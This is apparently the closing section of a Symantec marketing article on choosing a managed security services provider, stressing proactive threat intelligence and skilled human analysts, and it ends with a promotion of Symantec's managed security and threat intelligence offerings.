  • Being proactive is being prepared. Threats are taking longer to uncover and becoming more costly to remediate.  As a result there are bigger impacts on businesses. Gone are the days when identifying a breach or compromise was enough.  The potential for loss of data or money is far too great to wait for a malicious event to occur.   You must prepare for what might happen long before your income or your reputation is affected.  Your MSSP should have deep knowledge of what’s happening outside of your company -- in your industry or region.  This knowledge should come from a vast collection network that draws from millions of endpoints around the world. The output from that should be an ongoing stream of intelligence to you about IoCs and attacks that have occurred in organizations similar to yours, so you can deploy your people and technology to address any oncoming threats.

  • There is no substitute for human intelligence in the fight against today’s cyber threats.  Technology can identify threats in the wild and associate technical indicators (IP addresses, domains, file hashes) with what reveals itself on your network, servers or endpoints.  But nothing replaces the rich contextual judgement of skilled security analysts – analysts with specializations such as threat hunting, certifications such as GIAC, or training with governmental or intelligence entities. Your MSSP should have multiple, global SOCs, staffed with analysts and service teams who provide local-language support as well as specific knowledge of your organization, industry and geography.  That type of dedication is what links the technical to the contextual that is specific to your business.

Learn More:  Symantec™ Managed Security Services (MSS) acts as an extension of your security operations team.  We have been recognized as an industry leader in Gartner’s managed security services provider category for 12 consecutive years. We work with you to extend and complement your current team so you can focus on what’s critical to your strategic agenda.  Through our Cyber Security Services, we help you to address a broad spectrum of cyber security challenges.  Our suite includes DeepSight Threat Intelligence, Managed Security Services, Incident Response and Cyber Skills Development.

 

[1] ISACA, CyberSecurity Nexus
